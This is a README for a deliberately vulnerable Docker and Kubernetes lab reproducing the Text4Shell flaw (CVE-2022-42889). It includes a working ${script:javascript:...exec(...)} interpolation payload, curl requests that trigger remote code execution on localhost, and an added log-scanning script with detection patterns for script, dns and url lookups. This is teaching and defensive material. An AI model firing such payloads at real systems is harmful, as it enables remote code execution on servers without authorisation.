Text4Shell CVE-2022-42889
Docker Lab for CVE-2022-42889
You can either build the Docker image locally or pull the image from Docker Hub and run the container.
Clone the repo
git clone https://github.com/devenes/text4shell-cve-2022-42889.git
Build the Docker image locally
docker build --tag=text4shell .
Run the Docker container
docker run -d --rm -p 8080:8080 text4shell
Or pull the image from Docker Hub and run the container
docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0
Test the app by passing a string to the search parameter:
curl http://localhost:8080/text4shell/attack?search=<anything>
- The attack can be performed by passing a string of the form ${prefix:name}, where the prefix is the aforementioned lookup:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
Attack using curl:
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
- You can also try using the dns or url prefixes
Get the container id
docker container ls
Get into the container
docker exec -it <container_id> bash
Check if the RCE attack was successful
- You should see a file named foo created in the /tmp directory:
ls /tmp/
You can stop the container by running the following command
docker container stop <container_id>
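A defender-side check for the request used in this lab, as an added example that is not part of the original repo: it percent-decodes the query string of access-log lines and flags ${script:, ${dns: and ${url: lookups. The log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Lookup prefixes named on this page; extend the tuple to flag other lookups.
RISKY_PREFIXES = ("script", "dns", "url")
# Matches "${prefix:" case-insensitively in already-decoded text.
LOOKUP_RE = re.compile(r"\$\{(%s):" % "|".join(RISKY_PREFIXES), re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2524%257B) is still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_lookups(log_line):
    """Return the lookup prefixes found in the query string of one access-log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    return [m.group(1).lower() for m in LOOKUP_RE.finditer(fully_decode(query))]

# Constructed sample lines (combined log format); line 2 carries the request from this page.
SAMPLE_LOG = [
    '172.17.0.1 - - [01/Jan/2023:10:00:00 +0000] "GET /text4shell/attack?search=hello HTTP/1.1" 200 31',
    '172.17.0.1 - - [01/Jan/2023:10:00:05 +0000] "GET /text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D HTTP/1.1" 200 64',
    '172.17.0.1 - - [01/Jan/2023:10:00:09 +0000] "GET /text4shell/attack?search=%2524%257Bdns%253Aexample.com%257D HTTP/1.1" 200 40',
    '172.17.0.1 - - [01/Jan/2023:10:00:12 +0000] "GET /text4shell/attack?search=%24%7Bprice%7D HTTP/1.1" 200 30',
]

def scan(lines):
    """Map 1-based line numbers to the prefixes detected on that line."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        found = find_lookups(line)
        if found:
            hits[number] = found
    return hits

if __name__ == "__main__":
    for number, prefixes in scan(SAMPLE_LOG).items():
        print(f"line {number}: interpolation lookup(s) {prefixes}")
```

The decode loop is bounded so that a request wrapped in many encoding layers cannot make the scanner spin; raise max_rounds if your proxies add more layers.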
Kubernetes Lab for CVE-2022-42889
Change the directory to kubernetes and follow the instructions in the README.md file.
cd kubernetes
Create kind cluster
kind create cluster --config kind-config.yaml
Deploy the vulnerable app to the cluster
kubectl apply -f deployment.yaml
Create a service to expose the app
kubectl apply -f service.yaml
Attack the vulnerable app using curl
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
Get the pod name using kubectl get pods
kubectl get pods
Get into the pod using kubectl exec
kubectl exec -it $(kubectl get pods | grep text4shell | awk '{print $1}') -- bash
Check if the attack was successful
ls /tmp/ | grep foo
You can find the detailed tutorial on my Udemy course.
References: